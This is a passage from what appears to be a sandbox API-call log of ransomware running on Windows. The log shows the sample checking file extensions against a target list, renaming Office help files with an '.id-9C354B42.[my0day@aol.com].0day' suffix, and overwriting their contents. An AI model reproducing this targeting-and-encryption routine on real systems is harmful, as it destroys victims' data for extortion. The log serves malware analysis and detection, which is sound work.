lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".jpg") returned 4 [0037.055] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".doc") returned 4 [0037.056] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString=".docx") returned 5 [0037.056] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0037.056] lstrlenW (lpString=".pdf") returned 4 [0037.056] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString=".xls") returned 4 [0037.056] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString=".xlsx") returned 5 [0037.056] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0037.056] lstrlenW (lpString=".ppt") returned 4 [0037.056] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.056] lstrlenW (lpString=".zip") returned 4 [0037.056] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.056] lstrlenW (lpString=".rar") returned 4 [0037.056] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString=".bz2") returned 4 [0037.056] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString=".7z") returned 3 [0037.056] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.056] lstrlenW (lpString=".dbf") returned 4 [0037.056] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.056] lstrlenW (lpString=".1cd") returned 4 [0037.056] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.056] lstrlenW (lpString=".jpg") returned 4 [0037.056] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.056] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.056] lstrlenW (lpString="ipsptg.xml") returned 10 [0037.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.057] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2240) returned 1 [0037.057] CloseHandle (hObject=0x1c4) returned 1 [0037.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0037.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.057] lstrlenW (lpString=".doc") returned 4 [0037.057] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.057] lstrlenW (lpString=".docx") returned 5 [0037.057] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0037.057] lstrlenW (lpString=".pdf") returned 4 [0037.057] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.057] lstrlenW (lpString=".xls") returned 4 [0037.057] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.057] lstrlenW (lpString=".xlsx") returned 5 [0037.057] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0037.057] lstrlenW (lpString=".ppt") returned 4 [0037.058] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".zip") returned 4 [0037.058] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.058] lstrlenW (lpString=".rar") returned 4 [0037.058] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString=".bz2") returned 4 [0037.058] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString=".7z") returned 3 [0037.058] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".dbf") returned 4 [0037.058] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".1cd") returned 4 [0037.058] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".jpg") returned 4 [0037.058] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".doc") returned 4 [0037.058] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString=".docx") returned 5 [0037.058] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0037.058] lstrlenW (lpString=".pdf") returned 4 [0037.058] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString=".xls") returned 4 [0037.058] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString=".xlsx") returned 5 [0037.058] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0037.058] lstrlenW (lpString=".ppt") returned 4 [0037.058] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.058] lstrlenW (lpString=".zip") returned 4 [0037.059] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.059] lstrlenW (lpString=".rar") returned 4 [0037.059] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.059] lstrlenW (lpString=".bz2") returned 4 [0037.059] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.059] lstrlenW (lpString=".7z") returned 3 [0037.059] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.059] lstrlenW (lpString=".dbf") returned 4 [0037.059] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.059] lstrlenW (lpString=".1cd") returned 4 [0037.059] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0037.059] lstrlenW (lpString=".jpg") returned 4 [0037.059] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.059] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.059] lstrlenW (lpString="ipsrom.xml") returned 10 [0037.059] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.060] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2644) returned 1 [0037.060] CloseHandle (hObject=0x1c4) returned 1 [0037.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0037.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.060] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.060] lstrlenW (lpString=".doc") returned 4 [0037.060] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString=".docx") returned 5 [0037.060] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0037.060] lstrlenW (lpString=".pdf") returned 4 [0037.060] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString=".xls") returned 4 [0037.060] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString=".xlsx") returned 5 [0037.060] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0037.060] lstrlenW (lpString=".ppt") returned 4 [0037.060] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.060] lstrlenW (lpString=".zip") returned 4 [0037.060] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.060] lstrlenW (lpString=".rar") returned 4 [0037.060] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString=".bz2") returned 4 [0037.060] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.060] lstrlenW (lpString=".7z") returned 3 [0037.060] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.060] lstrlenW (lpString=".dbf") returned 4 [0037.061] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".1cd") returned 4 [0037.061] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".jpg") returned 4 [0037.061] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".doc") returned 4 [0037.061] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString=".docx") returned 5 [0037.061] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0037.061] lstrlenW (lpString=".pdf") returned 4 [0037.061] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString=".xls") returned 4 [0037.061] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString=".xlsx") returned 5 [0037.061] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0037.061] lstrlenW (lpString=".ppt") returned 4 [0037.061] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".zip") returned 4 [0037.061] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.061] lstrlenW (lpString=".rar") returned 4 [0037.061] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString=".bz2") returned 4 [0037.061] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString=".7z") returned 3 [0037.061] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".dbf") returned 4 [0037.061] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.061] lstrlenW (lpString=".1cd") returned 4 [0037.062] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 61 [0037.062] lstrlenW (lpString=".jpg") returned 4 [0037.062] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.062] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.062] lstrlenW (lpString="ipsrus.xml") returned 10 [0037.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.063] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2542) returned 1 [0037.063] CloseHandle (hObject=0x1c4) returned 1 [0037.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0x20 [0037.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.063] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.063] lstrlenW (lpString=".doc") returned 4 [0037.063] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.063] lstrlenW (lpString=".docx") returned 5 [0037.063] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0037.063] lstrlenW (lpString=".pdf") returned 4 [0037.063] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.063] lstrlenW (lpString=".xls") returned 4 [0037.063] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.063] lstrlenW (lpString=".xlsx") returned 5 [0037.063] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0037.063] lstrlenW (lpString=".ppt") returned 4 [0037.063] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.063] lstrlenW (lpString=".zip") returned 4 [0037.063] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.063] lstrlenW (lpString=".rar") returned 4 [0037.064] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString=".bz2") returned 4 [0037.064] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString=".7z") returned 3 [0037.064] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString=".dbf") returned 4 [0037.064] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString=".1cd") returned 4 [0037.064] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString=".jpg") returned 4 [0037.064] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString=".doc") returned 4 [0037.064] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString=".docx") returned 5 [0037.064] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0037.064] lstrlenW (lpString=".pdf") returned 4 [0037.064] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString=".xls") returned 4 [0037.064] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString=".xlsx") returned 5 [0037.064] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0037.064] lstrlenW (lpString=".ppt") returned 4 [0037.064] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.064] lstrlenW (lpString=".zip") returned 4 [0037.064] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.064] lstrlenW (lpString=".rar") returned 4 [0037.064] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.065] lstrlenW (lpString=".bz2") returned 4 [0037.065] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.065] lstrlenW (lpString=".7z") returned 3 [0037.065] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.065] lstrlenW (lpString=".dbf") returned 4 [0037.065] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.065] lstrlenW (lpString=".1cd") returned 4 [0037.065] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 61 [0037.065] lstrlenW (lpString=".jpg") returned 4 [0037.065] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.065] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.065] lstrlenW (lpString="ipssrb.xml") returned 10 [0037.065] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.065] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2568) returned 1 [0037.065] CloseHandle (hObject=0x1c4) returned 1 [0037.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0x20 [0037.066] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.066] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0037.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0037.066] lstrlenW (lpString=".doc") returned 4 [0037.066] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString=".docx") returned 5 [0037.066] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0037.066] lstrlenW (lpString=".pdf") returned 4 [0037.066] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString=".xls") returned 4 [0037.066] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString=".xlsx") returned 5 [0037.066] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0037.066] lstrlenW (lpString=".ppt") returned 4 [0037.066] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0037.066] lstrlenW (lpString=".zip") returned 4 [0037.066] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.066] lstrlenW (lpString=".rar") returned 4 [0037.066] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString=".bz2") returned 4 [0037.066] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.066] lstrlenW (lpString=".7z") returned 3 [0037.066] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0037.066] lstrlenW (lpString=".dbf") returned 4 [0037.066] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.068] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0037.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.069] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.069] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.069] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3270058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.074] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.074] ReadFile (in: hFile=0x1c4, lpBuffer=0x32b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x32b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.077] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.077] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.077] ReadFile (in: hFile=0x1c4, lpBuffer=0x32f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x32f0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.625] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.625] WriteFile (in: hFile=0x1c4, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0037.648] SetEndOfFile (hFile=0x1c4) returned 1 [0037.648] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f7a0a8 [0037.649] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.649] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.650] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: 